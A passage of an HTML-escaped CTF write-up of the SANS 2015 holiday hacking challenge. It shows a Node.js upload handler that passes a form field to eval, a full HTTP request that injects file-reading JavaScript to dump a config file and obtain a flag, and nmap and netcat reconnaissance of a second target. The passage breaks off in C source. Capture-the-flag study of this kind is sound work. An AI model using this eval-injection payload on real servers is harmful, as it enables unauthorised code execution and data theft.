  &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;sessions&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;sessionid&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="nx"&gt;logged_in&lt;/span&gt; &lt;span class="o"&gt;===&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nx"&gt;sessions&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;sessionid&lt;/span&gt;&lt;span class="p"&gt;].&lt;/span&gt;&lt;span class="nx"&gt;user_level&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;99&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="c1"&gt;// NEDFORD: this should be 99 not 100 so admins can upload&lt;/span&gt;
    &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;msgs&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[];&lt;/span&gt;
    &lt;span class="nx"&gt;file&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;req&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;file&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;buffer&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;req&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;file&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;mimetype&lt;/span&gt; &lt;span class="o"&gt;===&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;image/png&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="nx"&gt;msgs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;push&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Upload successful.&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="hll"&gt;      &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;postproc_syntax&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;req&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;body&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;postproc&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/span&gt;      &lt;span class="nx"&gt;console&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;File upload syntax:&amp;quot;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;postproc_syntax&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
      &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;postproc_syntax&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;none&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="nx"&gt;postproc_syntax&lt;/span&gt; &lt;span class="o"&gt;!==&lt;/span&gt; &lt;span class="kc"&gt;undefined&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nx"&gt;msgs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;push&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Executing post process...&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;result&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="nx"&gt;d&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;run&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="hll"&gt;          &lt;span class="nx"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;eval&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;(&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;postproc_syntax&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;)&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/span&gt;        &lt;span class="p"&gt;});&lt;/span&gt;
        &lt;span class="c1"&gt;// STUART: (WIP) working to improve image uploads to do some post processing.&lt;/span&gt;
        &lt;span class="nx"&gt;msgs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;push&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Post process result: &amp;#39;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;result&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
      &lt;span class="p"&gt;}&lt;/span&gt;
      &lt;span class="nx"&gt;msgs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;push&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;File pending super-admin approval.&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
      &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;msgs&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;msgs&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
      &lt;span class="nx"&gt;msgs&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;push&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;File not one of the approved formats: .png&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
      &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;msgs&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;msgs&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
  &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt;
    &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;render&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;index&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;title&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;GIYH::ADMIN PORT V.01&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;session&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;sessions&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="nx"&gt;sessionid&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="nx"&gt;res&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;res&lt;/span&gt; &lt;span class="p"&gt;});&lt;/span&gt;
  &lt;span class="nx"&gt;next&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
&lt;span class="p"&gt;});&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;When a file is uploaded, it's post-processed. To do so, the server
&lt;code&gt;eval&lt;/code&gt; s some code sent by us. Whoopsie! We can send arbitrary JavaScript
code, and it will be executed by the server. This means that we can send code
to read the configuration file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/files&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;52.192.152.132&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.5.0&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;text/html,application/xhtml+xml,application/xml;q=0.9,*/\*;q=0.8&lt;/span&gt;
&lt;span class="na"&gt;Accept-Language&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip, deflate&lt;/span&gt;
&lt;span class="na"&gt;Referer&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;http://52.192.152.132/files&lt;/span&gt;
&lt;span class="na"&gt;Cookie&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;sessionid=X7VWEHkmmlBfutfSWIKF&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;multipart/form-data; boundary=---------------------------1090026508808451371305736143&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;368&lt;/span&gt;

-----------------------------1090026508808451371305736143
Content-Disposition: form-data; name=&amp;quot;postproc&amp;quot;

require(&amp;#39;fs&amp;#39;).readFileSync(&amp;#39;/gnome/www/files/gnome.conf&amp;#39;, &amp;#39;utf8&amp;#39;, function (err, data) {})
-----------------------------1090026508808451371305736143
Content-Disposition: form-data; name=&amp;quot;file&amp;quot;; filename=&amp;quot;bar.png&amp;quot;
Content-Type: image/png

foo

-----------------------------1090026508808451371305736143--
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;X-Powered-By&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;GIYH::SuperGnome by AtnasCorp&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;text/html; charset=utf-8&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;4208&lt;/span&gt;
&lt;span class="na"&gt;ETag&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;W/&amp;quot;1070-Jo7i+NGHd32e2cYWZTjmCQ&amp;quot;&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Sat, 26 Dec 2015 23:41:46 GMT&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;

&lt;span class="cp"&gt;&amp;lt;!DOCTYPE html&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;html&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;head&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;title&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;GIYH::ADMIN PORT V.01&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;title&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
[snip]
&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;ul&lt;/span&gt; &lt;span class="na"&gt;class&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;nav navbar-nav&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;li&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;a&lt;/span&gt; &lt;span class="na"&gt;href&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;/&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;Home&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;a&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;li&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;li&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;a&lt;/span&gt; &lt;span class="na"&gt;href&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;/cameras&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;Cameras&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;a&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;li&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;li&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;a&lt;/span&gt; &lt;span class="na"&gt;href&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;/files&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;Files&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;a&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;li&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;li&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;a&lt;/span&gt; &lt;span class="na"&gt;href&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;/gnomenet&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;GnomeNET&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;a&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;li&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;li&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;a&lt;/span&gt; &lt;span class="na"&gt;href&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;/settings&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;Settings&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;a&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;li&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;li&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;a&lt;/span&gt; &lt;span class="na"&gt;href&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;/?logout=1&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;Logout&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;a&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;li&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;ul&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;div&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;div&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;nav&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;div&lt;/span&gt; &lt;span class="na"&gt;class&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;jumbotron&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;h1&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;Files&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;h1&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;p&lt;/span&gt; &lt;span class="na"&gt;class&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;message&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;Upload successful.&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;p&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;p&lt;/span&gt; &lt;span class="na"&gt;class&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;message&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;Executing post process...&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;p&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;p&lt;/span&gt; &lt;span class="na"&gt;class&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;message&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;Post process result: Gnome Serial Number: BU22_1729_2716057
Current config file: ./tmp/e31faee/cfg/sg.01.v1339.cfg
Allow new subordinates?: YES
Camera monitoring?: YES
Audio monitoring?: YES
Camera update rate: 60min
Gnome mode: SuperGnome
Gnome name: SG-04
Allow file uploads?: YES
Allowed file formats: .png
Allowed file size: 512kb
Files directory: /gnome/www/files/
&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;p&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;p&lt;/span&gt; &lt;span class="na"&gt;class&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;message&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;File pending Nedfords approval.&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;p&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;[snip]
&lt;/pre&gt;&lt;/div&gt;
&lt;img alt="sg04_w00t.png" class="align-center" src="/images/sans-christmas-challenge-2015/sg04_w00t.png" /&gt;
&lt;p&gt;The flag for this SuperGnome is &lt;code&gt;BU22_1729_2716057&lt;/code&gt;
(&lt;a class="reference external" href="https://en.wikipedia.org/wiki/Bender_%28Futurama%29"&gt;geeky reference&lt;/a&gt;).&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="id5"&gt;
&lt;h3&gt;&lt;a class="reference external" href="http://54.233.105.81/"&gt;SuperGnome05&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;This SuperGnome was particular: indeed, the vulnerability was not in the
web interface, but in a network service run by the SuperGnome. If we
take a look at the result of a &lt;code&gt;nmap&lt;/code&gt; command, we can see that
we can connect to the SuperGnome on the port 4242:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; nmap &lt;span class="m"&gt;54&lt;/span&gt;.233.105.81

&lt;span class="go"&gt;Starting Nmap 6.47 ( http://nmap.org ) at 2016-01-09 10:55 CET&lt;/span&gt;
&lt;span class="go"&gt;Nmap scan report for ec2-54-233-105-81.sa-east-1.compute.amazonaws.com (54.233.105.81)&lt;/span&gt;
&lt;span class="go"&gt;Host is up (0.30s latency).&lt;/span&gt;
&lt;span class="go"&gt;Not shown: 997 filtered ports&lt;/span&gt;
&lt;span class="go"&gt;PORT     STATE  SERVICE&lt;/span&gt;
&lt;span class="go"&gt;80/tcp   open   http&lt;/span&gt;
&lt;span class="go"&gt;4242/tcp open   vrml-multi-use&lt;/span&gt;
&lt;span class="go"&gt;5555/tcp closed freeciv&lt;/span&gt;

&lt;span class="go"&gt;Nmap done: 1 IP address (1 host up) scanned in 22.17 seconds&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's connect to it using &lt;code&gt;netcat&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; nc &lt;span class="m"&gt;54&lt;/span&gt;.233.105.81 &lt;span class="m"&gt;4242&lt;/span&gt;

&lt;span class="go"&gt;Welcome to the SuperGnome Server Status Center!&lt;/span&gt;
&lt;span class="go"&gt;Please enter one of the following options:&lt;/span&gt;

&lt;span class="go"&gt;1 - Analyze hard disk usage&lt;/span&gt;
&lt;span class="go"&gt;2 - List open TCP sockets&lt;/span&gt;
&lt;span class="go"&gt;3 - Check logged in users&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Ok, this seems to be a service to get some informations about
the SuperGnomes. Let's see if we have a copy of the binary
in our copy of the firmware&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; grep -Rn &lt;span class="s2"&gt;&amp;quot;Welcome to the SuperGnome Server Status Center&amp;quot;&lt;/span&gt; .

&lt;span class="go"&gt;Fichier binaire ./usr/bin/sgstatd correspondant&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Ok, so the binary program listening on the port 4242 seems to
be &lt;code&gt;/usr/bin/sgstatd&lt;/code&gt;. If we look carefully, we can
find the source for such a program on SuperGnome01:&lt;/p&gt;
&lt;img alt="sg01_file_list.png" class="align-center" src="/images/sans-christmas-challenge-2015/sg01_file_list.png" /&gt;
&lt;p&gt;You can download the source code &lt;a class="reference external" href="/docs/sans-christmas-challenge-2015/sgnet.zip"&gt;here&lt;/a&gt;
(sha256: &lt;code&gt;2343ce7345b960144fcb39ca01c2cf406e6db9a7847eaae6361d69ef5169d4e4&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;Now let's look at the source code, and see where our input
are being processed (I cleaned it up a bit):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="c1"&gt;// File sgstatd.c, line 21&lt;/span&gt;
&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;choice&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;&amp;quot;&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;Welcome to the SuperGnome Server Status Center!&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;51&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;&amp;quot;Please enter one of the following options:&lt;/span&gt;&lt;span class="se"&gt;\n\n&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;45&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;&amp;quot;1 - Analyze hard disk usage&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;28&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;&amp;quot;2 - List open TCP sockets&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;26&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;write&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;sd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;&amp;quot;3 - Check logged in users&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;27&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
